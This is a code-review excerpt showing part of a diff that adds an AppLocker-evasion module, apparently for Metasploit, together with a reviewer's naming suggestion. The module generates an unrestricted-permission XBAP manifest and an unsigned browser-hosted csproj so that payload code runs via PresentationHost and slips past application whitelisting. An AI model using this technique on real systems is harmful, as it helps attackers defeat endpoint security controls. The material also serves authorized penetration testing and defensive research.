modules/evasion/windows/applocker_evasion_presentationhost.rb

```diff
@@ -0,0 +1,167 @@
+    HEREDOC
+  end
+
+  def presentationhost_manifest
+    <<~HEREDOC
+      <?xml version="1.0" encoding="utf-8"?>
+      <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
+      <assemblyIdentity version="1.0.0.0" name="MyApplication.app" />
+      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
+      <security>
+      <applicationRequestMinimum>
+      <defaultAssemblyRequest permissionSetReference="Custom" />
+      <PermissionSet class="System.Security.PermissionSet" version="1" ID="Custom" SameSite="site" Unrestricted="true" />
+      </applicationRequestMinimum>
+      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
+      <requestedExecutionLevel level="asInvoker" uiAccess="false" />
+      </requestedPrivileges>
+      </security>
+      </trustInfo>
+      </assembly>
+    HEREDOC
+  end
+
+  def presentationhost_csproj
+    <<~HEREDOC
+      <?xml version="1.0" encoding="utf-8"?>
+      <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+      <Import Project="$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')" />
+      <PropertyGroup>
+      <Configuration Condition=" '$(Configuration)' == '' ">Release</Configuration>
+      <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+      <OutputType>WinExe</OutputType>
+      <HostInBrowser>true</HostInBrowser>
+      <GenerateManifests>true</GenerateManifests>
+      <SignManifests>false</SignManifests>
+      </PropertyGroup>
+      <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+      <Optimize>true</Optimize>
+      <OutputPath>.</OutputPath>
+      </PropertyGroup>
+      <ItemGroup>
+      <Reference Include="System" />
+      </ItemGroup>
+      <ItemGroup>
+      <Compile Include="#{datastore['FILE_ONE']}">
+      <DependentUpon>#{datastore['FILE_ONE']}</DependentUpon>
+      <SubType>Code</SubType>
+      </Compile>
+      </ItemGroup>
+      <ItemGroup>
+      <None Include="#{datastore['FILE_TWO']}" />
+      </ItemGroup>
+      <Import Project="$(MSBuildToolsPath)\\Microsoft.CSharp.targets" />
+      </Project>
+    HEREDOC
+  end
+
+  def file_format_filename(name = '')
+    name.empty? ? @fname : @fname = name
+  end
+
+  def create_files
+    f1 = datastore['FILE_ONE'].empty? ? 'presentationhost.xaml.cs' : datastore['FILE_ONE']
+    f1 << '.xaml.cs' unless f1.downcase.end_with?('.xaml.cs')
+    f2 = datastore['FILE_TWO'].empty? ? 'presentationhost.manifest' : datastore['FILE_TWO']
+    f2 << '.manifest' unless f2.downcase.end_with?('.manifest')
+    f3 = datastore['FILE_THREE'].empty? ? 'presentationhost.csproj' : datastore['FILE_THREE']
+    f3 << '.csproj' unless f3.downcase.end_with?('.csproj')
+    file1 = presentationhost_xaml_cs
+    file2 = presentationhost_manifest
+    file3 = presentationhost_csproj
```

Comment:
Renaming `file1`, `file2`, and `file3` to `xaml`, `manifest`, and `csproj` might make this a bit easier to read and follow.